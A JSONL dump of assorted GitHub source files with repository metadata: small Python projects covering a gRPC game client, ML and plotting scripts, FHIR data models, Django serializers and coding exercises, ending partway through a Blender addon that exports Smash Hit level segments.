+{"seq_id":"8317444328","text":"from __future__ import print_function\n\n\nimport socket\nimport sys\nimport grpc\nimport threading\nimport package.proto.mafiaRPC_pb2_grpc as mafiaGRPC\nfrom package.proto.mafiaRPC_pb2 import Player, Request, PlayerId, Response, Status, SUCCESS, FAIL\nfrom optparse import OptionParser\n\ndefault_player_name = sys.platform\nsession_status = 1\n\n\ndef start_notifier(stub, player):\n try:\n for event in stub.Subscribe(player):\n print('\\n' + event.data)\n if session_status == 0:\n return\n except Exception:\n pass\n\n\ndef start_session(stub, player_name):\n response: PlayerId = stub.GetNewPlayerId(Request(message=''))\n if player_name == default_player_name:\n player_name = f'Guest_{response.id}'\n # print(f'New player with name {player_name} and id {response.id}')\n host_address = socket.gethostbyname(socket.gethostname())\n player = Player(id=response.id, name=player_name, address=host_address)\n while True:\n ans = input('If you want join the game, write \\'yes\\', or no to quit the game: ')\n if ans == 'yes':\n t = threading.Thread(target=start_notifier, args=(stub, player,))\n t.start()\n t.join()\n elif ans == 'no':\n responsez: Response = stub.Unsubscribe(player)\n print('Response status: ', response.status)\n return\n\n\ndef run(address: str, port: str, player_name: str):\n with grpc.insecure_channel(f'{address}:{port}') as channel:\n stub = mafiaGRPC.MafiaClientStub(channel)\n start_session(stub, player_name)\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option(\"-a\", \"--address\", dest=\"address\", default='localhost',\n help='connect to server using custom address')\n parser.add_option(\"-p\", \"--port\", dest=\"port\", default='5345',\n help='connect to server using custom port')\n (options, args) = parser.parse_args()\n name = input('Please input your name: ')\n run(options.address, options.port, name)\n\n","repo_name":"yevzman/SOA_Mafia","sub_path":"Hello_Mafia/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71214341669","text":"#!/usr/bin/env python3\n\nimport click\nfrom textproof.fileio import FileIO\nfrom textproof.checked_text import CheckedText\n\n@click.command()\n@click.argument('path')\n@click.option('--output', default=None, help=\"the path to write to\")\ndef main(path, output):\n file = FileIO(path, output)\n try:\n file.load()\n except FileNotFoundError:\n print(f\"Could not open file {path}\")\n return\n\n check = CheckedText(file.data)\n check.fix_typos()\n file.data = str(check)\n\n file.save()\n\n # import cProfile, pstats\n # with cProfile.Profile() as pr:\n # file = FileIO(path, output)\n # try:\n # file.load()\n # except FileNotFoundError:\n # print(f\"Could not open file {path}\")\n # return\n\n # check = CheckedText(file.data)\n # check.fix_typos()\n # file.data = str(check)\n\n # file.save()\n # stats = pstats.Stats(pr)\n # stats.strip_dirs()\n # stats.sort_stats(pstats.SortKey.CUMULATIVE)\n # stats.print_stats(10)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CodeMouse92/textproof","sub_path":"src/textproof/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73674371111","text":"import matplotlib.pyplot as plt\nfrom glob import glob\nimport numpy as np\n\ndef get_kappa_from_exp(fold):\n\n path = glob('./eval/val_data_fold{}/files_*/kappa_scores_fold_{}_epoch_*.txt'.format(fold, fold))\n L_score = []\n D_score = []\n H_score = []\n Avg_score = []\n epochs = []\n for p in path:\n ep = int(p.split('/')[-1].split('_')[-1][:-4])\n epochs.append(ep)\n f = open(p, \"r\")\n vals = f.read()[1:-2].split(' ')\n vals = list(filter(None, vals))\n L_score.append(float(vals[0]))\n D_score.append(float(vals[1]))\n H_score.append(float(vals[2]))\n Avg_score.append(float(vals[3]))\n pass\n return epochs, L_score, D_score, H_score, Avg_score\n\ndef main():\n # Dictionary mapping split_* to experiment number\n #split_to_exp_tl = {0:7, 1:8, 2:9, 3:10, 4:11, 5:12, 6:13, 8:15, 10:17, 12:19}\n #split_to_exp_notl = {0:20, 1:21, 2:22, 3:23, 4:24, 5:25, 6:26, 8:27, 10:28, 12:29}\n\n exp1 = 1 \n exp2 = 2\n exp3 = 3\n\n colors = ['blue', 'red', 'green']\n # TL\n for i, ex in enumerate([exp3, exp2, exp1]):\n epochs, L_score, D_score, H_score, Avg_score = get_kappa_from_exp(ex)\n idx = np.argsort(epochs)\n epochs = np.array(epochs)[idx]\n L_score = np.array(L_score)[idx]\n D_score = np.array(D_score)[idx]\n H_score = np.array(H_score)[idx]\n Avg_score = np.array(Avg_score)[idx]\n\n plt.plot(epochs, Avg_score, color=colors[i], linestyle='--')\n\n #exp1 = split_to_exp_notl[3]\n #exp2 = split_to_exp_notl[4]\n #exp3 = split_to_exp_notl[5]\n ## NOTL\n #for i, ex in enumerate([exp3, exp2, exp1]):\n # epochs, L_score, D_score, H_score, Avg_score = get_kappa_from_exp(ex)\n # idx = np.argsort(epochs)\n # epochs = np.array(epochs)[idx]\n # L_score = np.array(L_score)[idx]\n # D_score = np.array(D_score)[idx]\n # H_score = np.array(H_score)[idx]\n # Avg_score = np.array(Avg_score)[idx]\n\n # plt.plot(epochs, Avg_score, color=colors[i])\n\n plt.yticks(np.arange(0, 1, 0.1))\n\n plt.xlim([0, 105])\n plt.ylim([0, 1])\n\n plt.xlabel('epochs')\n plt.ylabel('Kappa')\n plt.title('UTime JET')\n plt.legend(('TL 6-shots','TL 3-shots', 'TL 1-shots'), loc = 'best')\n\n plt.savefig('UTime_TL_kappa_scores_s1.png')\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"gmarceca/UTime-PlasmaStates","sub_path":"extra_scripts/plot_kappa_vs_epochs_TL.py","file_name":"plot_kappa_vs_epochs_TL.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33655883011","text":"import cv2\nimport os\nimport numpy as np\nfrom skimage import io\nimport matplotlib.pyplot as plt\nfrom skimage.feature import hog\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import precision_score,recall_score\nimport pickle\n\nTRAIN_COUNT = 300\nTEST_COUNT = 50\n\ndef get_features(object_detect, count, test=False):\n if test:\n img_path = f\"data/test_set/{object_detect}s/{object_detect}.%d.jpg\"\n start = 4011\n else:\n img_path = f\"data/train_set/{object_detect}s/{object_detect}.%d.jpg\"\n start = 100\n\n\n if object_detect == \"cat\":\n labels = np.array([0 for _ in range(count)]).reshape(-1, 1)\n else:\n labels = np.array([1 for _ in range(count)]).reshape(-1, 1)\n\n\n features = list()\n for i in range(start, start+count):\n print(img_path % i)\n # 读取图片\n gray = cv2.imread(img_path % i, cv2.IMREAD_GRAYSCALE)\n # 尺寸缩放\n gray = cv2.resize(gray, (128, 128))\n # 中值滤波\n gray = cv2.medianBlur(gray, 3)\n # HOG特征提取\n hog_image = hog(gray, orientations=9, pixels_per_cell=(8, 8), cells_per_block=(8, 8))\n features.append(hog_image.flatten())\n features = np.array(features)\n return features, labels\n\n\ndef get_predict_img(img_path):\n gray = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n # 尺寸缩放\n gray = cv2.resize(gray, (128, 128))\n # 中值滤波\n gray = cv2.medianBlur(gray, 3)\n normalised_blocks, hog_image = hog(gray, orientations=9, pixels_per_cell=( 8, 8), cells_per_block=(8, 8), visualise=True)\n return hog_image.reshape(1, -1)\n\ncat, cat_labels = get_features(object_detect=\"cat\", count=TRAIN_COUNT)\ndog, dog_labels = get_features(object_detect=\"dog\", count=TRAIN_COUNT)\nimg = np.vstack([cat, dog])\nlabels = np.vstack([cat_labels, dog_labels])\nres = np.hstack([img, labels])\nnp.random.shuffle(res)\n\nclf = SVC(probability=True)\ndata = res[:, :-1]\nlabels = res[:, -1]\nclf.fit(data, labels)\n\n\n# ----------- 预测单张图片 ---------------------------------\n# test_img = get_predict_img(\"training_set/cats/cat.38.jpg\")\n# pred = clf.predict(test_img)\n# print(pred)\n# ----------- 预测单张图片 ---------------------------------\n\ntest_cat, test_cat_labels = get_features(object_detect=\"cat\", count=TEST_COUNT, test=True)\ntest_dog, test_dog_labels = get_features(object_detect=\"dog\", count=TEST_COUNT, test=True)\n\ntest_img = np.vstack([test_cat, test_dog])\ntest_labels = np.vstack([test_cat_labels, test_dog_labels])\n\npred = clf.predict(test_img)\n\nprecision = precision_score(pred,test_labels)\nrecall = recall_score(pred,test_labels)\nprint(\"实际类别:\",test_labels.flatten())\nprint(\"预测类别:\",pred.flatten().astype(int))\nprint(f\"精准率:{precision}, 召回率:{recall}\")\n\n\nwith open(\"model/svm.pkl\",'wb') as f:\n pickle.dump(clf,f)\n","repo_name":"Kuludu/BlindCode","sub_path":"hog/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4920154556","text":"from data_models.patient import Patient\nfrom data_models.condition import Condition\nfrom data_models.specimen import Specimen\nfrom data_models.observation import Observation\nfrom data_models.molecular_sequence import MolecularSequence\n\nimport pandas as pd\n\nclass Bundle:\n resource_type = None\n resources = None\n\n def __init__(self, resource_type, data, data_type='csv', patients=None, specimens=None, molecularSequences=None):\n self.resource_type = resource_type\n if data_type == 'csv':\n self.parse_csv(resource_type, data, patients, specimens, molecularSequences)\n else:\n self.parse_csv(data)\n\n def parse_csv(self, resource_type, data, patients=None, specimens=None, molecularSequences=None):\n self.resources = {}\n if resource_type == 'Patient':\n for index, row in data.iterrows():\n self.resources[row[\"Id\"]] = Patient(row, 'csv')\n elif resource_type == 'Condition':\n disease = data[data['disease'] != 'normal']\n for index, row in disease.iterrows():\n self.resources[row[\"individual\"]] = Condition(row, 'csv', patients)\n elif resource_type == 'Specimen':\n for index, row in data.iterrows():\n self.resources[row[\"sample\"]] = Specimen(row, 'csv', patients)\n elif resource_type == 'MolecularSequence':\n for index, row in data.iterrows():\n self.resources[row[\"gene_id\"]] = MolecularSequence(row, 'csv')\n elif resource_type == 'Observation':\n for index, row in data.iterrows():\n for sk, sv in specimens.resources.items():\n self.resources[sk + ':' + row['Gene ID']] = Observation(row, 'csv',\n patients = patients,\n specimens = specimens,\n specimenId = sk,\n molecularSequences = molecularSequences)\n\n def upload(self, server):\n for res in self.resources.values():\n res.upload(server)\n\n def update(self, server, print_json=False):\n for res in self.resources.values():\n res.print_json = print_json\n res.update(server)\n\n def print(self, print_json=False):\n print(f'Bundle of: {self.resource_type}')\n for r in self.resources.values():\n r.print_json = print_json\n print(r)\n","repo_name":"frankkramer-lab/gene-expression-on-fhir","sub_path":"data_processing/data_models/bundle.py","file_name":"bundle.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"19714985003","text":"import pandas\nimport gzip\n\nclass ReadData:\n \n\tdef __init__(self, filename,dialect):\n\t\tif filename.split('.')[-1] == 'gz':\n\t\t\tself.datafile = gzip.open(filename, newline='')\n\t\telse:\n\t\t\tself.datafile = open(filename, newline='')\n\t\tself.dialect = dialect\n\t\tself.__read_data()\n\t\t\n\t# Read data using pandas. Simplify data structure for Configuration\n\tdef __read_data(self):\n\t\t# This outputs a dataframe as is\n\t\tif self.dialect == \"SAMoS\":\n\t\t\t# this has a # in front of the header, and I cannot seem to tell python to disregard it (and not come up as 'unnamed')\n\t\t\t# as a result, all the columns labels are shifted one to the left\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0,sep = '\\s+')\n\t\t\ttemp = self.data.columns\n\t\t\tcolshift = {}\n\t\t\tfor u in range(len(temp)-1): \n\t\t\t\tcolshift[temp[u]] = temp[u+1]\n\t\t\tself.data.rename(columns = {temp[len(temp)-1]: 'garbage'},inplace=True)\n\t\t\tself.data.rename(columns = colshift,inplace=True,errors=\"raise\")\n\t\t\t#print(self.data.columns)\n\t\telif self.dialect == \"CCCPy\":\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0)\n\t\t\t# look of the header\n\t\t\t# currTime,xPos,yPos,xVel,yVel,polAngle,polVel,xPol,yPol,rad,glued\n\t\t\t# We need to muck about with the headers to distil this to a unified format\n\t\t\t# Classical samos header:\n\t\t\t# id type flag radius x y z vx vy vz nx ny nz \n\t\t\tself.data.rename(columns={\"xPos\": \"x\", \"yPos\": \"y\", \"xVel\": \"vx\", \"yVel\": \"vy\", \"xPol\": \"nx\", \"yPol\": \"ny\", \"rad\":\"radius\", \"glued\":\"type\"}, inplace=True,errors=\"raise\")\n\t\t\t#print(self.data.columns)\n\t\telif self.dialect == \"CAPMD\":\n\t\t\tself.data = pandas.read_csv(self.datafile,header=0)\n\t\telse:\n\t\t\tprint(\"Unknown data format dialect!\")\n\t\t\n\n","repo_name":"silkehenkes/SAMoSA","sub_path":"read_data_csv.py","file_name":"read_data_csv.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"20111090277","text":"import re\n\nstr = \"01024956962\"\npattern = re.compile(r\"(\\d{3})(\\d{4})(\\d{4})\")\n\nnew_str = pattern.sub( r\"\\1-\\2-\\3\", str )\nprint( new_str )\n\n#result = re.match( pattern, str )\n#if result:\n# phone = '-'.join(result.groups())\n#\n#print(phone)\n","repo_name":"popsof/pda","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21826809761","text":"#\n# @lc app=leetcode id=881 lang=python3\n#\n# [881] Boats to Save People\n#\n\n# @lc code=start\nclass Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n people.sort()\n left = 0\n right = len(people)-1\n\n boatCount = 0\n while left <= right:\n if people[left] + people[right] <= limit:\n left += 1\n\n right -= 1\n boatCount += 1\n\n return boatCount\n\n\n# @lc code=end\n","repo_name":"derryltaufik/leetcode","sub_path":"881.boats-to-save-people.py","file_name":"881.boats-to-save-people.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"30682690750","text":"\nfrom drafts import gmail_create_draft\nimport string\n\nstop_words = open(\"stopwords.txt\", encoding=\"utf-8\").read()\n\nfrom collections import Counter\n\nimport matplotlib.pyplot as plt\nkh = input(\"Enter the content for the email: \")\nto = input(\"Enter the recipient mail id: \")\nfro_m = input(\"Enter your email id: \")\nsub = input('Enter the subject of the email: ')\ngmail_create_draft(to, fro_m, sub, kh)\n\nsent = kh\nlower_case = sent.lower()\n\ncleaned_text = lower_case.translate(str.maketrans('', '', string.punctuation))\n\ntokenized_words = cleaned_text.split()\n\nfinal_words = []\nfor word in tokenized_words:\n if word not in stop_words:\n final_words.append(word)\n\n\nemotion_list = []\nwith open('emotions.txt', 'r') as file:\n for line in file:\n clear_line = line.replace(\"\\n\", '').replace(\",\", '').replace(\"'\", '').strip()\n word, emotion = clear_line.split(':')\n\n if word in final_words:\n emotion_list.append(emotion)\n\nw = Counter(emotion_list)\nprint(\" The emotion of the mail is \", w)\n\nfig, ax1 = plt.subplots()\nax1.bar(w.keys(), w.values())\nfig.autofmt_xdate()\nplt.savefig('graph.png')\nplt.show()\n\n\n\n","repo_name":"Dhanush17raj/Sentiment_analysis-gmail_api","sub_path":"nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1901885789","text":"def solution(enter, leave):\n answer = []\n room = []\n N = len(enter)\n cnt = [[0]*(N+1) for _ in range((N+1))]\n while True:\n if enter:\n room.append(enter.pop(0))\n if room[-1] == leave[0]:\n n = len(room)\n if n > 1:\n for i in range(n):\n for j in range(n):\n if room[i] != room[j]:\n cnt[room[i]][room[j]] += 1\n room.pop(-1)\n leave.pop(0)\n while True:\n if leave and leave[0] in room:\n room.pop(room.index(leave[0]))\n leave.pop(0)\n else:\n break\n if len(leave) == 0:\n break\n for i in range(1, N+1):\n answer.append(N-cnt[i].count(0)+1)\n return answer\n\nsolution([1,3,2], [1,2,3])\nsolution([1,4,2,3], [2,1,3,4])\nsolution([3,2,1], [2,1,3])\nsolution([3,2,1], [1,3,2])\nsolution([1,4,2,3], [2,1,4,3])","repo_name":"Lee-sungheon/TIL","sub_path":"coding_test/line3.py","file_name":"line3.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20941657280","text":"from rest_framework.reverse import reverse\nfrom rest_framework.serializers import (\n HyperlinkedModelSerializer,\n HyperlinkedRelatedField,\n ModelSerializer,\n SerializerMethodField,\n)\nfrom .models import Tag, Company, Partner, Job\n\n\nclass TagSerializer(HyperlinkedModelSerializer):\n \"\"\"Serializer for Tag data\"\"\"\n class Meta:\n model = Tag\n fields = \"__all__\"\n extra_kwargs = {\n \"url\": {\n \"lookup_field\": \"slug\",\n \"view_name\": \"api-tag-detail\",\n }\n }\n\n\nclass CompanySerializer(ModelSerializer):\n \"\"\"Serializer for Company data\"\"\"\n tags = TagSerializer(many=True, read_only=True)\n\n class Meta:\n model = Company\n exclude = (\"id\",)\n\n\nclass PartnerSerializer(CompanySerializer):\n \"\"\"Serializer for Partner data\"\"\"\n class Meta:\n model = Partner\n exclude = (\"id\",)\n\n\nclass JobSerializer(ModelSerializer):\n \"\"\"Serializer for Job data\"\"\"\n partner = HyperlinkedRelatedField(\n queryset=Partner.objects.all(),\n lookup_field=\"slug\",\n view_name=\"api-partner-detail\",\n )\n tags = TagSerializer(many=True, read_only=True)\n class Meta:\n model = Job\n exclude = (\"id\",)\n","repo_name":"Kinnect-Careers/kinnect_app_dj","sub_path":"src/organizer/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29858313257","text":"\"\"\"\nMain file for Shatter tools\n\"\"\"\n\nimport common as common\n\nSH_MAX_STR_LEN = common.MAX_STRING_LENGTH\n\nimport xml.etree.ElementTree as et\nimport bpy\nimport gzip\nimport random\nimport os\nimport webbrowser\nimport tempfile\nimport secrets\nimport obstacle_db\nimport segment_export\nimport segment_import\nimport segstrate\nimport extra_tools\nimport quick_test\nimport updater\nimport autogen\nimport remote_api\nimport util\nimport butil\nimport level_pack_ui\n\nfrom bpy.props import (\n\tStringProperty,\n\tBoolProperty,\n\tIntProperty,\n\tIntVectorProperty,\n\tFloatProperty,\n\tFloatVectorProperty,\n\tEnumProperty,\n\tPointerProperty,\n)\n\nfrom bpy.types import (\n\tPanel,\n\tMenu,\n\tOperator,\n\tPropertyGroup,\n\tAddonPreferences,\n)\n\nfrom bpy_extras.io_utils import ImportHelper\n\n# The name of the test server. If set to false initially, the test server will\n# be disabled.\ng_process_test_server = True\n\n# :-3\ng_got_ricked = False\n\ndef get_prefs():\n\t\"\"\"\n\tGet a reference to the addon preferences\n\t\"\"\"\n\t\n\treturn bpy.context.preferences.addons[\"shatter\"].preferences\n\nclass ExportHelper2:\n\t\"\"\"\n\tExtended from blender's default ExportHelper to fix some bugs.\n\t\"\"\"\n\t\n\tfilepath: StringProperty(\n\t\tname = \"File Path\",\n\t\tdescription = \"Filepath used for exporting the file\",\n\t\tmaxlen = 1024,\n\t\tsubtype = 'FILE_PATH',\n\t)\n\t\n\tcheck_existing: BoolProperty(\n\t\tname = \"Check Existing\",\n\t\tdescription = \"Check and warn on overwriting existing files\",\n\t\tdefault = True,\n\t\toptions = {'HIDDEN'},\n\t)\n\t\n\t# subclasses can override with decorator\n\t# True == use ext, False == no ext, None == do nothing.\n\tcheck_extension = True\n\t\n\tdef invoke(self, context, _event):\n\t\tif not self.filepath:\n\t\t\tblend_filepath = context.blend_data.filepath\n\t\t\tif not blend_filepath:\n\t\t\t\tblend_filepath = \"untitled\"\n\t\t\telse:\n\t\t\t\tblend_filepath = os.path.splitext(blend_filepath)[0]\n\t\t\t\n\t\t\tself.filepath = blend_filepath + self.filename_ext\n\t\t\n\t\tcontext.window_manager.fileselect_add(self)\n\t\treturn {'RUNNING_MODAL'}\n\t\n\tdef check(self, _context):\n\t\t\"\"\"\n\t\tCustom version of filepath check that fixes issues with two dots in names\n\t\t\"\"\"\n\t\t\n\t\tchange_ext = False\n\t\t\n\t\tif self.check_extension is not None and self.check_extension:\n\t\t\tif not self.filepath.endswith(self.filename_ext):\n\t\t\t\tself.filepath += self.filename_ext\n\t\t\t\tchange_ext = True\n\t\t\n\t\treturn change_ext\n\nclass sh_ExportCommon(bpy.types.Operator, ExportHelper2):\n\t\"\"\"\n\tCommon code and values between export types\n\t\"\"\"\n\t\n\tsh_meshbake_template: StringProperty(\n\t\tname = \"Template\",\n\t\tdescription = \"A relitive or full path to the template file used for baking meshes. If you use APK Editor Studio and the Smash Hit APK is open, the path to the file will be pre-filled\",\n\t\tdefault = \"\",\n\t\tsubtype = \"FILE_PATH\",\n\t\tmaxlen = SH_MAX_STR_LEN,\n\t)\n\t\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tAutomatic templates.xml detection\n\t\t\"\"\"\n\t\t\n\t\tif (not self.sh_meshbake_template):\n\t\t\tself.sh_meshbake_template = segment_export.tryTemplatesPath()\n\nclass sh_export(sh_ExportCommon):\n\t\"\"\"\n\tUncompressed segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export\"\n\tbl_label = \"Export Segment\"\n\t\n\tfilename_ext = \".xml.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export(self, context):\n\tself.layout.operator(\"shatter.export\", text=\"Segment (.xml.mp3)\")\n\nclass sh_export_gz(sh_ExportCommon):\n\t\"\"\"\n\tCompressed segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_compressed\"\n\tbl_label = \"Export Compressed Segment\"\n\t\n\tfilename_ext = \".xml.gz.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.gz.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tcompress = True,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_gz(self, context):\n\tself.layout.operator(\"shatter.export_compressed\", text=\"Compressed Segment (.xml.gz.mp3)\")\n\nclass sh_export_auto(bpy.types.Operator):\n\t\"\"\"\n\tAuto find APK path and use level/room/segment name to export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_auto\"\n\tbl_label = \"Export to APK\"\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tNone,\n\t\t\tcontext,\n\t\t\tcompress = True,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"sh_meshbake_template\": segment_export.tryTemplatesPath(),\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"auto_find_filepath\": True,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_auto(self, context):\n\tself.layout.operator(\"shatter.export_auto\", text=\"Shatter: Export to APK\")\n\nclass sh_export_test(Operator):\n\t\"\"\"\n\tCompressed segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_test_server\"\n\tbl_label = \"Export segment to test server\"\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tNone,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"sh_test_server\": True,\n\t\t\t\t\"sh_meshbake_template\": segment_export.tryTemplatesPath()\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_test(self, context):\n\tself.layout.operator(\"shatter.export_test_server\", text=\"Shatter: Quick Test Server\")\n\nclass sh_export_binary(sh_ExportCommon):\n\t\"\"\"\n\tBinary segment export\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.export_bin\"\n\tbl_label = \"Export Binary Segment\"\n\t\n\tfilename_ext = \".bin\"\n\tfilter_glob = bpy.props.StringProperty(default='*.bin', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\tsh_properties = context.scene.sh_properties\n\t\t\n\t\tresult = segment_export.sh_export_segment(\n\t\t\tself.filepath,\n\t\t\tcontext,\n\t\t\tparams = {\n\t\t\t\t\"sh_meshbake_template\": self.sh_meshbake_template,\n\t\t\t\t\"sh_vrmultiply\": sh_properties.sh_vrmultiply,\n\t\t\t\t\"sh_box_bake_mode\": sh_properties.sh_box_bake_mode,\n\t\t\t\t\"bake_menu_segment\": sh_properties.sh_menu_segment,\n\t\t\t\t\"bake_vertex_light\": sh_properties.sh_ambient_occlusion,\n\t\t\t\t\"lighting_enabled\": sh_properties.sh_lighting,\n\t\t\t\t\"binary\": True,\n\t\t\t}\n\t\t)\n\t\t\n\t\treturn result\n\ndef sh_draw_export_binary(self, context):\n\tself.layout.operator(\"shatter.export_bin\", text=\"Binary Segment (.bin)\")\n\n# UI-related\n\nclass sh_import(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tImport for uncompressed segments\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.import\"\n\tbl_label = \"Import Segment\"\n\t\n\tcheck_extension = False\n\tfilename_ext = \".xml.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\treturn segment_import.sh_import_segment(self.filepath, context)\n\ndef sh_draw_import(self, context):\n\tself.layout.operator(\"shatter.import\", text=\"Segment (.xml.mp3)\")\n\nclass sh_import_gz(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tImport for compressed segments\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.import_gz\"\n\tbl_label = \"Import Compressed Segment\"\n\t\n\tcheck_extension = False\n\tfilename_ext = \".xml.gz.mp3\"\n\tfilter_glob = bpy.props.StringProperty(default='*.xml.gz.mp3', options={'HIDDEN'}, maxlen=255)\n\t\n\tdef execute(self, context):\n\t\treturn segment_import.sh_import_segment(self.filepath, context, True)\n\ndef sh_draw_import_gz(self, context):\n\tself.layout.operator(\"shatter.import_gz\", text=\"Compressed Segment (.xml.gz.mp3)\")\n\nclass sh_shl_login(bpy.types.Operator):\n\t\"\"\"\n\tLog in to the online service\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.shl_login\"\n\tbl_label = \"Log in to Shatter Online Service\"\n\t\n\tdef execute(self, context):\n\t\treturn {\"FINISHED\"}\n\nclass sh_auto_setup_segstrate(bpy.types.Operator):\n\t\"\"\"\n\tSet up segstrate segment protection\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.segstrate_auto\"\n\tbl_label = \"One-click setup segstrate protection\"\n\t\n\tdef execute(self, context):\n\t\tcontext.window.cursor_set('WAIT')\n\t\t\n\t\tapk_path = butil.find_apk(no_override = True)\n\t\t\n\t\tif (not apk_path):\n\t\t\traise butil.show_message(\"Segstrate error\", \"Could not find an APK path to use for segstrate. Please open an APK in APK Editor Studio. Note: To prevent accidently corrupting files, using an overridden assets directory is not allowed.\")\n\t\t\treturn {\"FINISHED\"}\n\t\t\n\t\tsegstrate.setup_apk(util.absolute_path(f\"{apk_path}/../\"))\n\t\t\n\t\tcontext.window.cursor_set('DEFAULT')\n\t\t\n\t\treturn {\"FINISHED\"}\n\nclass sh_static_segstrate(bpy.types.Operator, ImportHelper):\n\t\"\"\"\n\tSegstrate locking for when you have an APK you want to lock\n\t\"\"\"\n\t\n\tbl_idname = \"shatter.segstrate_static\"\n\tbl_label = 